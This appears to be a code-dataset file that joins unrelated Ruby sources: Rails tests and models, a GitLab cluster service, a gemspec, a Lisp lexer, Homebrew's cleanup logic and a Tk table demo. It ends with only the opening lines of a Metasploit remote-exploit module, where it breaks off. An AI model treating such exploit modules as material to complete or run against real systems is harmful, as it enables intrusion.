assert_not_nil se.shape, "just making sure other associations still work"
end
end
end
end
class EagerLoadNestedIncludeWithMissingDataTest < ActiveRecord::TestCase
def setup
@davey_mcdave = Author.create(name: "Davey McDave")
@first_post = @davey_mcdave.posts.create(title: "Davey Speaks", body: "Expressive wordage")
@first_comment = @first_post.comments.create(body: "Inflamatory doublespeak")
@first_categorization = @davey_mcdave.categorizations.create(category: Category.first, post: @first_post)
end
teardown do
@davey_mcdave.destroy
@first_post.destroy
@first_comment.destroy
@first_categorization.destroy
end
def test_missing_data_in_a_nested_include_should_not_cause_errors_when_constructing_objects
assert_nothing_raised do
# @davey_mcdave doesn't have any author_favorites
includes = { posts: :comments, categorizations: :category, author_favorites: :favorite_author }
Author.all.merge!(includes: includes, where: { authors: { name: @davey_mcdave.name } }, order: "categories.name").to_a
end
end
end
| 30.824 | 124 | 0.749286 |
bbbeb4b30e487915c76056dbf1285c2120a24b81 | 1,500 | # frozen_string_literal: true
module Clusters
class CreateService
attr_reader :current_user, :params
def initialize(user = nil, params = {})
@current_user, @params = user, params.dup
end
def execute(access_token: nil)
raise ArgumentError, 'Unknown clusterable provided' unless clusterable
cluster_params = params.merge(global_params).merge(clusterable_params)
cluster_params[:provider_gcp_attributes].try do |provider|
provider[:access_token] = access_token
end
cluster = Clusters::Cluster.new(cluster_params)
unless can_create_cluster?
cluster.errors.add(:base, _('Instance does not support multiple Kubernetes clusters'))
end
return cluster if cluster.errors.present?
cluster.tap do |cluster|
cluster.save && ClusterProvisionWorker.perform_async(cluster.id)
end
end
private
def clusterable
@clusterable ||= params.delete(:clusterable)
end
def global_params
{ user: current_user }
end
def clusterable_params
case clusterable
when ::Project
{ cluster_type: :project_type, projects: [clusterable] }
when ::Group
{ cluster_type: :group_type, groups: [clusterable] }
when Instance
{ cluster_type: :instance_type }
else
raise NotImplementedError
end
end
# EE would override this method
def can_create_cluster?
clusterable.clusters.empty?
end
end
end
| 24.193548 | 94 | 0.672667 |
035481643331948fd023dd31af5ec9c5c13a65ec | 1,779 | # -*- encoding: utf-8 -*-
# stub: wdm 0.1.1 ruby lib
# stub: ext/wdm/extconf.rb
Gem::Specification.new do |s|
s.name = "wdm".freeze
s.version = "0.1.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Maher Sallam".freeze]
s.date = "2015-07-09"
s.description = "Windows Directory Monitor (WDM) is a library which can be used to monitor directories for changes. It's mostly implemented in C and uses the Win32 API for a better performance.".freeze
s.email = ["[email protected]".freeze]
s.extensions = ["ext/wdm/extconf.rb".freeze]
s.files = ["ext/wdm/extconf.rb".freeze]
s.homepage = "https://github.com/Maher4Ever/wdm".freeze
s.required_ruby_version = Gem::Requirement.new(">= 1.9.2".freeze)
s.rubygems_version = "3.1.3".freeze
s.summary = "Windows Directory Monitor (WDM) is a threaded directories monitor for Windows.".freeze
s.installed_by_version = "3.1.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<rake-compiler>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<guard-rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<guard-shell>.freeze, [">= 0"])
s.add_development_dependency(%q<pry>.freeze, [">= 0"])
else
s.add_dependency(%q<rake-compiler>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<guard-rspec>.freeze, [">= 0"])
s.add_dependency(%q<guard-shell>.freeze, [">= 0"])
s.add_dependency(%q<pry>.freeze, [">= 0"])
end
end
| 42.357143 | 203 | 0.687465 |
08a010203621e8616c444aa79c186a679efde775 | 393 | class User < ActiveRecord::Base
include Authenticable
has_many :presentations, :dependent => :destroy
has_one :billing_information
attr_accessor :old_password
def deliver_password_reset_instructions!
reset_perishable_token!
PasswordMailer.deliver_instructions(self)
end
def full_name
[first_name, last_name].join(" ")
end
def owner
self
end
end
| 17.086957 | 49 | 0.737913 |
5db65f289ccaf4c40d659c10f727289b7431190e | 2,121 | module RailsAdmin
module Config
module Actions
class New < RailsAdmin::Config::Actions::Base
RailsAdmin::Config::Actions.register(self)
register_instance_option :collection do
true
end
register_instance_option :http_methods do
[:get, :post] # NEW / CREATE
end
register_instance_option :controller do
proc do
if request.get? # NEW
@object = @abstract_model.new
@authorization_adapter && @authorization_adapter.attributes_for(:new, @abstract_model).each do |name, value|
@object.send("#{name}=", value)
end
if object_params = params[@abstract_model.param_key]
sanitize_params_for!(request.xhr? ? :modal : :create)
@object.set_attributes(@object.attributes.merge(object_params.to_h))
end
respond_to do |format|
format.html { render @action.template_name }
format.js { render @action.template_name, layout: false }
end
elsif request.post? # CREATE
@modified_assoc = []
@object = @abstract_model.new
sanitize_params_for!(request.xhr? ? :modal : :create)
@object.set_attributes(params[@abstract_model.param_key])
action_authorized = !@authorization_adapter || @authorization_adapter.authorize(:create, @abstract_model, @object)
if action_authorized && @object.save
@auditing_adapter && @auditing_adapter.create_object(@object, @abstract_model, _current_user)
respond_to do |format|
format.html { redirect_to_on_success }
format.js { render json: {id: @object.id.to_s, label: @model_config.with(object: @object).object_label} }
end
else
handle_save_error
end
end
end
end
register_instance_option :link_icon do
'icon-plus'
end
end
end
end
end
| 34.209677 | 128 | 0.573314 |
79cb75336a55555fddafa4fc6bd59d8f16d86c80 | 3,816 | require 'singleton'
module Klam
class Lexer
SYMBOL_CHARS = /[-=*\/+_?$!\@~><&%'#`;:{}a-zA-Z0-9.,]/
# Syntax tokens
class OpenParen
include Singleton
end
class CloseParen
include Singleton
end
def initialize(stream)
@stream = stream
@buffer = []
end
def eof?
@buffer.empty? && @stream.eof?
end
def getc
if @buffer.empty?
@stream.getc
else
@buffer.pop
end
end
def ungetc(c)
@buffer.push(c)
end
def next
drain_whitespace
unless eof?
c = getc
case c
when '('
OpenParen.instance
when ')'
CloseParen.instance
when '"'
consume_string
when SYMBOL_CHARS
ungetc(c)
consume_number_or_symbol
else
raise Klam::SyntaxError, "illegal character: #{c}"
end
end
end
private
def drain_whitespace
until eof?
c = getc
if c =~ /\S/
ungetc(c)
break
end
end
end
def consume_string
chars = []
loop do
raise Klam::SyntaxError, "unterminated string" if eof?
c = getc
break if c == '"'
chars << c
end
chars.join
end
def consume_number
# Shen allows multiple leading plusses and minuses. The plusses
# are ignored and an even number of minuses cancel each other.
# Thus '------+-7' is read as 7.
#
# The Shen reader parses "7." as the integer 7 and the symbol '.'
decimal_seen = false
negative = false
past_sign = false
chars = []
loop do
break if eof?
c = getc
if c =~ /\d/
past_sign = true
chars << c
elsif c == '.' && !decimal_seen
past_sign = true
decimal_seen = true
chars << c
elsif c == '+' && !past_sign
# ignore
elsif c == '-' && !past_sign
negative = !negative
else
ungetc c
break
end
end
chars.unshift('-') if negative
if chars.last == '.'
# A trailing decimal point is treated as part of the next
# token. Forget we saw it.
ungetc(chars.pop)
decimal_seen = false
end
str = chars.join
decimal_seen ? str.to_f : str.to_i
end
def consume_symbol
chars = []
loop do
break if eof?
c = getc
unless c =~ SYMBOL_CHARS
ungetc c
break
end
chars << c
end
str = chars.join
case str
when 'true'
true
when 'false'
false
else
str.to_sym
end
end
def consume_number_or_symbol
# First drain optional leading signs
# Then drain optional decimal point
# If there is another character and it is a digit, then it
# is a number. Otherwise it is a symbol.
chars = []
loop do
break if eof?
c = getc
unless c =~ /[-+]/
ungetc c
break
end
chars << c
end
if eof?
chars.reverse.each {|x| ungetc x}
return consume_symbol
end
c = getc
chars << c
if c == '.'
if eof?
chars.reverse.each {|x| ungetc x}
return consume_symbol
end
c = getc
chars << c
chars.reverse.each {|x| ungetc x}
if c =~ /\d/
return consume_number
else
return consume_symbol
end
elsif c =~ /\d/
chars.reverse.each {|x| ungetc x}
return consume_number
else
chars.reverse.each {|x| ungetc x}
return consume_symbol
end
end
end
end
| 20.516129 | 71 | 0.496331 |
393ad0c650b4b970d52aa4eb8b8aac2025633a98 | 6,031 | require 'spec_helper'
RSpec.describe SigepWeb do
subject(:sigep_web) { described_class }
before do
SigepWeb.configure do |config|
config.user = 'sigep'
config.password = 'n5f9t8'
config.administrative_code = '08082650'
config.contract = '9912208555'
config.card = '0057018901'
end
end
describe '.configuration' do
it 'should have the correct user' do
expect(SigepWeb.configuration.user).to eq 'sigep'
end
it 'should have the correct password' do
expect(SigepWeb.configuration.password).to eq 'n5f9t8'
end
it 'should have the correct administrative_code' do
expect(SigepWeb.configuration.administrative_code).to eq '08082650'
end
it 'should have the correct contract' do
expect(SigepWeb.configuration.contract).to eq '9912208555'
end
it 'should have the correct card' do
expect(SigepWeb.configuration.card).to eq '0057018901'
end
end
describe '.service_availability' do
let(:service_availability) { instance_double(SigepWeb::ServiceAvailability) }
before do
allow(SigepWeb::ServiceAvailability).to receive(:new).and_return(service_availability)
allow(service_availability).to receive(:request)
sigep_web.service_availability(
service_number: '0', source_zip: '0', target_zip: '0'
)
end
it 'is expected to access SigepWeb::ServiceAvailability#request' do
expect(service_availability).to have_received(:request)
end
end
describe '.search_client' do
let(:search_client) { instance_double(SigepWeb::SearchClient) }
before do
allow(SigepWeb::SearchClient).to receive(:new).and_return(search_client)
allow(search_client).to receive(:request)
sigep_web.search_client(
id_contract: '9992157880', id_post_card: '0067599079'
)
end
it 'is expeceted to access SigepWeb::SearchClient#request' do
expect(search_client).to have_received(:request)
end
end
describe '.zip_query' do
let(:zip_query) { instance_double(SigepWeb::ZipQuery) }
before do
allow(SigepWeb::ZipQuery).to receive(:new).and_return(zip_query)
allow(zip_query).to receive(:request)
sigep_web.zip_query(zip: '70002900')
end
it 'is expeceted to access SigepWeb::ZipQuery' do
expect(zip_query).to have_received(:request)
end
end
describe '.request_labels' do
let(:request_labels) { instance_double(SigepWeb::RequestLabels) }
before do
allow(SigepWeb::RequestLabels).to receive(:new).and_return(request_labels)
allow(request_labels).to receive(:request)
sigep_web.request_labels(
receiver_type: 'C', identifier: '000000000000',
id_service: '104707', qt_labels: '1'
)
end
it 'is expeceted to access SigepWeb::RequestLabels' do
expect(request_labels).to have_received(:request)
end
end
describe '.generate_labels_digit_verifier' do
let(:generate_labels_digit_verifier) { instance_double(SigepWeb::GenerateLabelsDigitVerifier) }
before do
allow(SigepWeb::GenerateLabelsDigitVerifier)
.to receive(:new).and_return(generate_labels_digit_verifier)
allow(generate_labels_digit_verifier).to receive(:request)
sigep_web.generate_labels_digit_verifier(labels: ['DL76023727 BR'])
end
it 'is expeceted to access SigepWeb::GenerateLabelsDigitVerifier' do
expect(generate_labels_digit_verifier).to have_received(:request)
end
end
describe '.request_ptp_services' do
let(:request_ptp_services) { instance_double(SigepWeb::RequestPlpServices) }
before do
allow(SigepWeb::RequestPlpServices)
.to receive(:new).and_return(request_ptp_services)
allow(request_ptp_services).to receive(:request)
sigep_web.request_plp_services(
labels: ['SX08689124BR'], id_plp_client: 123, plp: {}
)
end
it 'is expeceted to access SigepWeb::RequestPlpServices' do
expect(request_ptp_services).to have_received(:request)
end
end
describe '.postage_card_status' do
let(:postage_card_status) { instance_double(SigepWeb::PostageCardStatus) }
before do
allow(SigepWeb::PostageCardStatus)
.to receive(:new).and_return(postage_card_status)
allow(postage_card_status).to receive(:request)
sigep_web.postage_card_status(postage_number_card: '000')
end
it 'is expeceted to access SigepWeb::PostageCardStatus' do
expect(postage_card_status).to have_received(:request)
end
end
describe '.request_xml_plp' do
let(:request_xml_plp) { instance_double(SigepWeb::RequestXmlPlp) }
before do
allow(SigepWeb::RequestXmlPlp)
.to receive(:new).and_return(request_xml_plp)
allow(request_xml_plp).to receive(:request)
sigep_web.request_xml_plp(id_plp: '000')
end
it 'is expeceted to access SigepWeb::RequestXmlPlp' do
expect(request_xml_plp).to have_received(:request)
end
end
describe '.request_range' do
let(:request_range) { instance_double(SigepWeb::RequestRange) }
before do
allow(SigepWeb::RequestRange)
.to receive(:new).and_return(request_range)
allow(request_range).to receive(:request)
sigep_web.request_range(type: 'AP', service: '', quantity: 1)
end
it 'is expeceted to access SigepWeb::RequestRange' do
expect(request_range).to have_received(:request)
end
end
describe '.calculate_digit_checker' do
let(:calculate_digit_checker) { instance_double(SigepWeb::CalculateDigitChecker) }
before do
allow(SigepWeb::CalculateDigitChecker)
.to receive(:new).and_return(calculate_digit_checker)
allow(calculate_digit_checker).to receive(:request)
sigep_web.calculate_digit_checker(number: '666')
end
it 'is expeceted to access SigepWeb::CalculateDigitCheker' do
expect(calculate_digit_checker).to have_received(:request)
end
end
end
| 29.70936 | 99 | 0.705521 |
e8c71019a8c30aaa879a44d5dd62331a539880b7 | 1,464 | #Key-value store for field-specific configurations
class FieldConfig < ActiveRecord::Base
include ActiveModel::ForbiddenAttributesProtection
include PublicActivity::Common if defined? PublicActivity::Common
belongs_to :field
belongs_to :screen
validates_presence_of :key, :field_id
validates_uniqueness_of :key, :scope => [:screen_id, :field_id]
scope :default, where(:screen_id => nil)
def self.get(screen, field, key)
field_config = FieldConfig.where(:screen_id => screen.id, :field_id => field.id, :key => key).first
if !field_config.nil?
return field_config.value
else
return nil
end
end
# Identify the type of key, if it is being used from the global
# field_config application config hash.
#
# @return [Symbol, nil] The type of key or nil if not found.
def key_type
return nil if key.nil?
sym_key = key.to_sym
if Concerto::Application.config.field_configs.include?(sym_key)
return Concerto::Application.config.field_configs[sym_key][:type]
end
return nil
end
# Grab any options that they key has from the global field_config hash.
#
# @return [Array, nil] Returns the options or nil if there are none.
# For :select keys, this will return an array of the possible values.
def key_options
case key_type
when :select
return Concerto::Application.config.field_configs[key.to_sym][:values]
else
return nil
end
end
end
| 29.877551 | 103 | 0.710383 |
87b7181713f70e63ce45b8b57e535de4eb0a17a8 | 597 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module SampleApp
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 29.85 | 82 | 0.765494 |
9186f1ac3587ea81aa7546174cdc0befa4f9e8b8 | 1,275 | require 'spec_helper'
describe 'scaleio::package' do
let (:title) { 'gateway' }
let :default_params do
{
:pkg_ftp => 'pkg_ftp' }
end
let (:facts) {{ :osfamily => 'Debian' }}
let (:params) { default_params }
it { is_expected.to contain_scaleio__package(title)}
context 'ensure is absent' do
let :params do
default_params.merge(:ensure => 'absent')
end
it 'not contain packages' do
is_expected.not_to contain_scaleio__package('emc-scaleio-gateway')
end
end
context 'ensure is present' do
let :params do
default_params.merge(:ensure => 'present')
end
it { is_expected.to contain_file('ensure get_package.sh for gateway').with(
:ensure => 'present',
:path => '/root/get_package_gateway.sh',
:source => 'puppet:///modules/scaleio/get_package.sh',
:mode => '0700',
:owner => 'root',
:group => 'root')}
it { is_expected.to contain_exec('get_package gateway').with(
:command => '/root/get_package_gateway.sh pkg_ftp/Ubuntu gateway',
:path => '/bin:/usr/bin')}
it { is_expected.to contain_package('emc-scaleio-gateway').with(
:ensure => 'present',
:source => '/tmp/gateway/gateway.deb',
:provider => 'dpkg')}
end
end
| 28.333333 | 79 | 0.623529 |
7a8bd346bc88ffcc765e95ffb8d73d0f2f67730a | 310 | class Cody::Stack
class Create < Base
def perform
cfn.create_stack(
stack_name: @stack_name,
template_body: YAML.dump(@template),
capabilities: ["CAPABILITY_IAM"]
)
puts "Creating stack #{@stack_name}. Check CloudFormation console for status."
end
end
end
| 23.846154 | 84 | 0.645161 |
2679b4b76abe8f8cf474f1f5bcb33899bc1fce3c | 12,591 | # frozen_string_literal: true
require "utils/bottles"
require "utils/gems"
require "formula"
require "cask/cask_loader"
require "set"
CLEANUP_DEFAULT_DAYS = 30
CLEANUP_MAX_AGE_DAYS = 120
module CleanupRefinement
refine Pathname do
def incomplete?
extname.end_with?(".incomplete")
end
def nested_cache?
directory? && %w[cargo_cache go_cache glide_home java_cache npm_cache gclient_cache].include?(basename.to_s)
end
def go_cache_directory?
# Go makes its cache contents read-only to ensure cache integrity,
# which makes sense but is something we need to undo for cleanup.
directory? && %w[go_cache].include?(basename.to_s)
end
def prune?(days)
return false unless days
return true if days.zero?
return true if symlink? && !exist?
mtime < days.days.ago && ctime < days.days.ago
end
def stale?(scrub = false)
return false unless resolved_path.file?
if dirname.basename.to_s == "Cask"
stale_cask?(scrub)
else
stale_formula?(scrub)
end
end
private
def stale_formula?(scrub)
return false unless HOMEBREW_CELLAR.directory?
version = if to_s.match?(Pathname::BOTTLE_EXTNAME_RX)
begin
Utils::Bottles.resolve_version(self)
rescue
nil
end
end
version ||= basename.to_s[/\A.*(?:\-\-.*?)*\-\-(.*?)#{Regexp.escape(extname)}\Z/, 1]
version ||= basename.to_s[/\A.*\-\-?(.*?)#{Regexp.escape(extname)}\Z/, 1]
return false unless version
version = Version.new(version)
return false unless formula_name = basename.to_s[/\A(.*?)(?:\-\-.*?)*\-\-?(?:#{Regexp.escape(version)})/, 1]
formula = begin
Formulary.from_rack(HOMEBREW_CELLAR/formula_name)
rescue FormulaUnavailableError, TapFormulaAmbiguityError, TapFormulaWithOldnameAmbiguityError
return false
end
resource_name = basename.to_s[/\A.*?\-\-(.*?)\-\-?(?:#{Regexp.escape(version)})/, 1]
if resource_name == "patch"
patch_hashes = formula.stable&.patches&.select(&:external?)&.map(&:resource)&.map(&:version)
return true unless patch_hashes&.include?(Checksum.new(:sha256, version.to_s))
elsif resource_name && resource_version = formula.stable&.resources&.dig(resource_name)&.version
return true if resource_version != version
elsif version.is_a?(PkgVersion)
return true if formula.pkg_version > version
elsif formula.version > version
return true
end
return true if scrub && !formula.installed?
return true if Utils::Bottles.file_outdated?(formula, self)
false
end
def stale_cask?(scrub)
return false unless name = basename.to_s[/\A(.*?)\-\-/, 1]
cask = begin
Cask::CaskLoader.load(name)
rescue Cask::CaskUnavailableError
return false
end
return true unless basename.to_s.match?(/\A#{Regexp.escape(name)}\-\-#{Regexp.escape(cask.version)}\b/)
return true if scrub && !cask.versions.include?(cask.version)
if cask.version.latest?
return mtime < CLEANUP_DEFAULT_DAYS.days.ago &&
ctime < CLEANUP_DEFAULT_DAYS.days.ago
end
false
end
end
end
using CleanupRefinement
module Homebrew
class Cleanup
extend Predicable
PERIODIC_CLEAN_FILE = (HOMEBREW_CACHE/".cleaned").freeze
attr_predicate :dry_run?, :scrub?
attr_reader :args, :days, :cache
attr_reader :disk_cleanup_size
def initialize(*args, dry_run: false, scrub: false, days: nil, cache: HOMEBREW_CACHE)
@disk_cleanup_size = 0
@args = args
@dry_run = dry_run
@scrub = scrub
@days = days || CLEANUP_MAX_AGE_DAYS
@cache = cache
@cleaned_up_paths = Set.new
end
def self.install_formula_clean!(f)
return if ENV["HOMEBREW_NO_INSTALL_CLEANUP"]
cleanup = Cleanup.new
if cleanup.periodic_clean_due?
cleanup.periodic_clean!
elsif f.installed?
cleanup.cleanup_formula(f)
end
end
def periodic_clean_due?
return false if ENV["HOMEBREW_NO_INSTALL_CLEANUP"]
return true unless PERIODIC_CLEAN_FILE.exist?
PERIODIC_CLEAN_FILE.mtime < CLEANUP_DEFAULT_DAYS.days.ago
end
def periodic_clean!
return false unless periodic_clean_due?
ohai "`brew cleanup` has not been run in #{CLEANUP_DEFAULT_DAYS} days, running now..."
clean!(quiet: true, periodic: true)
end
def clean!(quiet: false, periodic: false)
if args.empty?
Formula.installed.sort_by(&:name).each do |formula|
cleanup_formula(formula, quiet: quiet)
end
cleanup_cache
cleanup_logs
cleanup_lockfiles
prune_prefix_symlinks_and_directories
unless dry_run?
cleanup_old_cache_db
rm_ds_store
HOMEBREW_CACHE.mkpath
FileUtils.touch PERIODIC_CLEAN_FILE
end
# Cleaning up Ruby needs to be done last to avoid requiring additional
# files afterwards. Additionally, don't allow it on periodic cleans to
# avoid having to try to do a `brew install` when we've just deleted
# the running Ruby process...
return if periodic
cleanup_portable_ruby
else
args.each do |arg|
formula = begin
Formulary.resolve(arg)
rescue FormulaUnavailableError, TapFormulaAmbiguityError, TapFormulaWithOldnameAmbiguityError
nil
end
cask = begin
Cask::CaskLoader.load(arg)
rescue Cask::CaskUnavailableError
nil
end
cleanup_formula(formula) if formula
cleanup_cask(cask) if cask
end
end
end
def unremovable_kegs
@unremovable_kegs ||= []
end
def cleanup_formula(formula, quiet: false)
formula.eligible_kegs_for_cleanup(quiet: quiet)
.each(&method(:cleanup_keg))
cleanup_cache(Pathname.glob(cache/"#{formula.name}--*"))
rm_ds_store([formula.rack])
cleanup_lockfiles(FormulaLock.new(formula.name).path)
end
def cleanup_cask(cask)
cleanup_cache(Pathname.glob(cache/"Cask/#{cask.token}--*"))
rm_ds_store([cask.caskroom_path])
cleanup_lockfiles(CaskLock.new(cask.token).path)
end
def cleanup_keg(keg)
cleanup_path(keg) { keg.uninstall }
rescue Errno::EACCES => e
opoo e.message
unremovable_kegs << keg
end
def cleanup_logs
return unless HOMEBREW_LOGS.directory?
logs_days = if days > CLEANUP_DEFAULT_DAYS
CLEANUP_DEFAULT_DAYS
else
days
end
HOMEBREW_LOGS.subdirs.each do |dir|
cleanup_path(dir) { dir.rmtree } if dir.prune?(logs_days)
end
end
def cleanup_unreferenced_downloads
return if dry_run?
return unless (cache/"downloads").directory?
downloads = (cache/"downloads").children
referenced_downloads = [cache, cache/"Cask"].select(&:directory?)
.flat_map(&:children)
.select(&:symlink?)
.map(&:resolved_path)
(downloads - referenced_downloads).each do |download|
if download.incomplete?
begin
LockFile.new(download.basename).with_lock do
download.unlink
end
rescue OperationInProgressError
# Skip incomplete downloads which are still in progress.
next
end
elsif download.directory?
FileUtils.rm_rf download
else
download.unlink
end
end
end
def cleanup_cache(entries = nil)
entries ||= [cache, cache/"Cask"].select(&:directory?).flat_map(&:children)
entries.each do |path|
next if path == PERIODIC_CLEAN_FILE
FileUtils.chmod_R 0755, path if path.go_cache_directory? && !dry_run?
next cleanup_path(path) { path.unlink } if path.incomplete?
next cleanup_path(path) { FileUtils.rm_rf path } if path.nested_cache?
if path.prune?(days)
if path.file? || path.symlink?
cleanup_path(path) { path.unlink }
elsif path.directory? && path.to_s.include?("--")
cleanup_path(path) { FileUtils.rm_rf path }
end
next
end
next cleanup_path(path) { path.unlink } if path.stale?(scrub?)
end
cleanup_unreferenced_downloads
end
def cleanup_path(path)
return unless @cleaned_up_paths.add?(path)
disk_usage = path.disk_usage
if dry_run?
puts "Would remove: #{path} (#{path.abv})"
@disk_cleanup_size += disk_usage
else
puts "Removing: #{path}... (#{path.abv})"
yield
@disk_cleanup_size += disk_usage - path.disk_usage
end
end
def cleanup_lockfiles(*lockfiles)
return if dry_run?
lockfiles = HOMEBREW_LOCKS.children.select(&:file?) if lockfiles.empty? && HOMEBREW_LOCKS.directory?
lockfiles.each do |file|
next unless file.readable?
next unless file.open(File::RDWR).flock(File::LOCK_EX | File::LOCK_NB)
begin
file.unlink
ensure
file.open(File::RDWR).flock(File::LOCK_UN) if file.exist?
end
end
end
def cleanup_portable_ruby
system_ruby_version =
Utils.popen_read("/usr/bin/ruby", "-e", "puts RUBY_VERSION")
.chomp
use_system_ruby = (
Gem::Version.new(system_ruby_version) >= Gem::Version.new(RUBY_VERSION)
) && ENV["HOMEBREW_FORCE_VENDOR_RUBY"].nil?
vendor_path = HOMEBREW_LIBRARY/"Homebrew/vendor"
portable_ruby_version_file = vendor_path/"portable-ruby-version"
portable_ruby_version = if portable_ruby_version_file.exist?
portable_ruby_version_file.read
.chomp
end
portable_ruby_path = vendor_path/"portable-ruby"
portable_ruby_glob = "#{portable_ruby_path}/*.*"
Pathname.glob(portable_ruby_glob).each do |path|
next if !use_system_ruby && portable_ruby_version == path.basename.to_s
if dry_run?
puts "Would remove: #{path} (#{path.abv})"
else
FileUtils.rm_rf path
end
end
return unless Dir.glob(portable_ruby_glob).empty?
return unless portable_ruby_path.exist?
bundler_path = vendor_path/"bundle/ruby"
if dry_run?
puts "Would remove: #{bundler_path} (#{bundler_path.abv})"
puts "Would remove: #{portable_ruby_path} (#{portable_ruby_path.abv})"
else
FileUtils.rm_rf [bundler_path, portable_ruby_path]
end
end
def cleanup_old_cache_db
FileUtils.rm_rf [
cache/"desc_cache.json",
cache/"linkage.db",
cache/"linkage.db.db",
]
end
def rm_ds_store(dirs = nil)
dirs ||= begin
Keg::MUST_EXIST_DIRECTORIES + [
HOMEBREW_PREFIX/"Caskroom",
]
end
dirs.select(&:directory?).each do |dir|
system_command "find",
args: [dir, "-name", ".DS_Store", "-delete"],
print_stderr: false
end
end
def prune_prefix_symlinks_and_directories
ObserverPathnameExtension.reset_counts!
dirs = []
Keg::MUST_EXIST_SUBDIRECTORIES.each do |dir|
next unless dir.directory?
dir.find do |path|
path.extend(ObserverPathnameExtension)
if path.symlink?
unless path.resolved_path_exists?
if path.to_s =~ Keg::INFOFILE_RX
path.uninstall_info unless dry_run?
end
if dry_run?
puts "Would remove (broken link): #{path}"
else
path.unlink
end
end
elsif path.directory? && !Keg::MUST_EXIST_SUBDIRECTORIES.include?(path)
dirs << path
end
end
end
dirs.reverse_each do |d|
if dry_run? && d.children.empty?
puts "Would remove (empty directory): #{d}"
else
d.rmdir_if_possible
end
end
return if dry_run?
return if ObserverPathnameExtension.total.zero?
n, d = ObserverPathnameExtension.counts
print "Pruned #{n} symbolic links "
print "and #{d} directories " if d.positive?
puts "from #{HOMEBREW_PREFIX}"
end
end
end
| 28.615909 | 114 | 0.616313 |
d5cd5e49ba137752290a423100a2b80921652368 | 3,297 | #!/usr/bin/env ruby
##
## debug.rb
##
## This demo uses most features of the table widget
##
## ( based on 'debug.tcl' included source archive of tktable extension )
##
require 'tk'
require 'tkextlib/tktable'
# create the table
ary = TkVariable.new_hash
rows = 25
cols = 20
# fill table variable
((-(rows))..rows).each{|x|
((-(cols))..cols).each{|y|
ary[x,y] = "r#{x},c#{y}"
}
}
lbl = TkLabel.new(:text=>"TkTable v2 Example")
table = Tk::TkTable.new(:rows=>rows, :cols=>cols, :variable=>ary,
:width=>6, :height=>6,
:titlerows=>1, :titlecols=>2,
:roworigin=>-5, :colorigin=>-2,
:coltagcommand=>proc{|col|
col = Integer(col)
(col>0 && col%2 == 1)? 'OddCol': ''
},
:selectmode=>:extended, :flashmode=>true,
:rowstretch=>:unset, :colstretch=>:unset,
:selecttitles=>false, :drawmode=>:single)
sx = table.xscrollbar(TkScrollbar.new)
sy = table.yscrollbar(TkScrollbar.new)
btn = TkButton.new(:text=>'Exit', :command=>proc{exit})
Tk.grid(lbl, '-', :sticky=>:ew)
Tk.grid(table, sy, :sticky=>:news)
Tk.grid(sx, :sticky=>:ew)
Tk.grid(btn, :sticky=>:ew, :columnspan=>2)
Tk.root.grid_columnconfig(0, :weight=>1)
Tk.root.grid_rowconfig(1, :weight=>1)
table.tag_configure('OddCol', :bg=>'brown', :fg=>'pink')
table.tag_configure('title', :bg=>'red', :fg=>'green', :relief=>:sunken)
table.tag_configure('dis', :state=>:disabled)
first = table[:colorigin]
%w(n s e w nw ne sw se c).each_with_index{|anchor, idx|
table.tag_configure(anchor, :anchor=>anchor)
table.tag_row(anchor, idx)
table.set([idx,first], anchor)
}
courier = TkFont.new(:family=>'Courier', :size=>10)
table.tag_configure('s', :font=>courier, :justify=>:center)
logo = TkPhotoImage.new(:file=>File.join(File.dirname(File.expand_path(__FILE__)), 'tcllogo.gif'))
table.tag_configure('logo', :image=>logo, :showtext=>true)
table.tag_cell('logo', [1,2], [2,3], [4,1])
table.tag_cell('dis', [2,1], [1,-1], [3,0])
table.set_width([-2,8], [-1,9], [0, 12], [4, 14])
table.set([1,1], "multi-line\ntext\nmight be\ninteresting",
[3,2], "more\nmulti-line\nplaying\n",
[2,2], "null\0byte")
# This is in the row span
l = TkLabel.new(table, :text=>'Window s', :bg=>'yellow')
table.window_configure([6,0], :sticky=>:s, :window=>l)
# This is in the row titles
l = TkLabel.new(table, :text=>'Window ne', :bg=>'yellow')
table.window_configure([4,-1], :sticky=>:ne, :window=>l)
# This will get swallowed by a span
l = TkLabel.new(table, :text=>'Window ew', :bg=>'yellow')
table.window_configure([5,3], :sticky=>:ew, :window=>l)
# This is in the col titles
l = TkLabel.new(table, :text=>'Window news', :bg=>'yellow')
table.window_configure([-5,1], :sticky=>:news, :window=>l)
l = TkLabel.new(table.winfo_parent, :text=>'Sibling l', :bg=>'orange')
table.window_configure([5,1], :sticky=>:news, :window=>l)
if table.span_list.empty?
table.set_spans([-1,-2], [0,3], [1,2], [0,5], [3,2], [2,2], [6,0], [4,0])
end
puts "Table is #{table.path} with array #{(table['variable'])}"
# table.postscript(:file=>'out.ps', :first=>:origin, :last=>[2,2])
Tk.mainloop
| 32.323529 | 98 | 0.598423 |
1ce8ba54ecb1417d64742a45d4e7314965b3f807 | 737 | require 'rails_helper'
describe Authentication, :type => :model do
let(:user) {FactoryGirl.build(:dealer)}
let(:authentication) {FactoryGirl.build(:authentication)}
# skip "add some examples to (or delete) #{__FILE__}"
# todo: check loading of oath_data and default_scope
it { should belong_to(:user) }
it 'belongs to User' do
expect(authentication.valid?).to be_truthy
end
it 'requires provider' do
authentication.provider = nil
expect(authentication).not_to be_valid
end
it 'requires provider Id' do
authentication.proid = nil
expect(authentication).not_to be_valid
end
it 'requires user Id' do
authentication.user_id = nil
expect(authentication).not_to be_valid
end
end
| 22.333333 | 59 | 0.719132 |
26d1c3c07ba4097eb8035d8849d63248fad2cf91 | 3,386 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
